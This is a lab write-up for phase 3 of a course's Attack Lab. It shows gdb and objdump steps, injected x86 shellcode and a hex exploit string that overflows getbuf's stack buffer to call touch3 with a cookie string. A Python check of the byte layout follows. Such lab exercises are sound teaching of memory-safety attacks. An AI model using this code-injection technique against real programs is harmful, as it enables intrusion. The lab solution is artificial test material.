Attack Lab: Phase 3
4/23/22
Run
$ gdb ctarget --tui
...
(gdb) break getbuf
Breakpoint 1 at 0x401b28: file buf.c, line 12.
(gdb) run -q
Starting program: /home/stu2020012872/3-lab-3-attacklab/target97/ctarget -q
Breakpoint 1, getbuf () at buf.c:12
(gdb) info registers rsp
rsp 0x55668cc0 0x55668cc0
Run
objdump --disassemble ctarget > ctarget.asm
Read File ctarget.asm
...
0000000000401b28 <getbuf>:
401b28: 48 83 ec 28 sub $0x28,%rsp
...
0000000000401c78 <touch3>:
...
Write File phase-3-inject.s
movq $0x55668cc8, %rdi
pushq $0x0000000000401c78
ret
Run
gcc -c phase-3-inject.s
objdump --disassemble phase-3-inject.o > phase-3-inject.asm
Read File phase-3-inject.asm
...
0000000000000000 <.text>:
0: 48 c7 c7 c8 8c 66 55 mov $0x55668cc8,%rdi
7: 68 78 1c 40 00 pushq $0x401c78
c: c3 retq
Read File cookie.txt
0x3a9a6c2f
Convert Cookie to String
The string should end with a \0.
33 61 39 61 36 63 32 66 00
Write File phase-3.txt
Place the string in the parent frame of getbuf, that is, in the stack frame of test, just past the overwritten return address.
48 c7 c7 c8 8c 66 55
68 78 1c 40 00
c3
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
98 8c 66 55 00 00 00 00
33 61 39 61 36 63 32 66 00
Run
./hex2raw < phase-3.txt > phase-3.in
./ctarget -i phase-3.in
Terminal Output
Cookie: 0x3a9a6c2f
Touch3!: You called touch3("3a9a6c2f")
Valid solution for level 3 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
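The two stack addresses in phase-3.txt are used above without being derived, so this added Python check (not part of the original write-up) decodes the same bytes and confirms how each field follows from the rsp value, the 0x28 frame size and the cookie. It assumes getbuf's buffer begins at the new rsp after `sub $0x28,%rsp`; the function names are this example's own.

```python
import re
import struct

# Values read from the walkthrough above.
RSP_AT_ENTRY = 0x55668CC0  # rsp at the getbuf breakpoint, before sub $0x28,%rsp
FRAME_SIZE = 0x28          # from "sub $0x28,%rsp"
TOUCH3, COOKIE = 0x401C78, 0x3A9A6C2F  # touch3 address, cookie.txt

# Bytes of phase-3.txt from above; the 27 padding bytes are regrouped as 3 x 9.
PHASE3_TXT = """
48 c7 c7 c8 8c 66 55      /* mov  $imm32,%rdi */
68 78 1c 40 00            /* push $imm32 */
c3                        /* ret */
00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00
98 8c 66 55 00 00 00 00   /* overwrites the saved return address */
33 61 39 61 36 63 32 66 00
"""

def parse_hex2raw(text):
    """Decode hex2raw input: whitespace-separated hex pairs, /* */ comments skipped."""
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return bytes(int(tok, 16) for tok in text.split())

def describe(raw, rsp_at_entry=RSP_AT_ENTRY, frame_size=FRAME_SIZE):
    """Map each field of the input to the stack address it lands on."""
    buffer_start = rsp_at_entry - frame_size  # assumption: buffer begins at the new rsp
    return {
        "buffer_start": buffer_start,
        "mov_imm": struct.unpack_from("<I", raw, 3)[0],   # imm32 after 48 c7 c7
        "push_imm": struct.unpack_from("<I", raw, 8)[0],  # imm32 after 68
        "return_target": struct.unpack_from("<Q", raw, frame_size)[0],
        "string_addr": rsp_at_entry + 8,  # first byte past the return address
        "string": raw[frame_size + 8:],
    }

def check(raw):
    """Return a list of inconsistencies; empty means the layout is self-consistent."""
    d = describe(raw)
    checks = [
        (d["return_target"] == d["buffer_start"], "return address is not the buffer start"),
        (d["mov_imm"] == d["string_addr"], "%rdi does not point at the string"),
        (d["push_imm"] == TOUCH3, "pushed address is not touch3"),
        (d["string"] == b"%08x\x00" % COOKIE, "string is not the NUL-terminated cookie text"),
    ]
    return [msg for ok, msg in checks if not ok]

if __name__ == "__main__":
    print(check(parse_hex2raw(PHASE3_TXT)) or "layout consistent")
```
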